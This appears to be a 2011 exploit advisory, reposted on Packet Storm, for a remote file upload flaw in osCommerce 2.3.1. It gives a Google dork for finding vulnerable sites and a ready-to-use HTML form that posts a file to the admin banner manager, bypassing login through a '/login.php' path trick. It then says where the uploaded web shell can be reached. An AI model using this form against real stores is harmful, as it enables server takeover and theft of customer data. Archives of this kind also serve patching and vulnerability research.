osCommerce version 2.3.1 suffers from a shell upload vulnerability.
6f77547245e4435487ff50cceecb12db25a0c48462dd2c5fb75464bdad739078# Exploit Title: [OSC 2.3.1: Remote File Upload Vulnerability : Banner Manager]
# Google Dork: [powered by oscommerce] (we will automatically add these to the GHDB)
# Date: [13-05-2011]
# Author: [Number 7]
# Software Link: [http://www.oscommerce.com/ext/oscommerce-2.3.1.zip]
# Version: [2.3.1]
# Tested on: [Linux-apache-win03-mac Os .... ]
# CVE : [if exists]
_______________________________________________________________________________________
<form name="new_banner" action="http://site/path/admin/banner_manager.php/login.php?action=insert" method="post" enctype="multipart/form-data"><br>
<input type="file" name="banners_image"><br>
<input name="submit" value=" Save " type="submit"></form>
you will find your shell in
http://site/path/images/yourshell.php
_______________________________________________________________________________________
Greetz: Ares-xGeek-allen-s man-SWAT-SPAM-TN // Tn-Hackers
Site: Top-sec.com/vb // arhack.net/vb
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed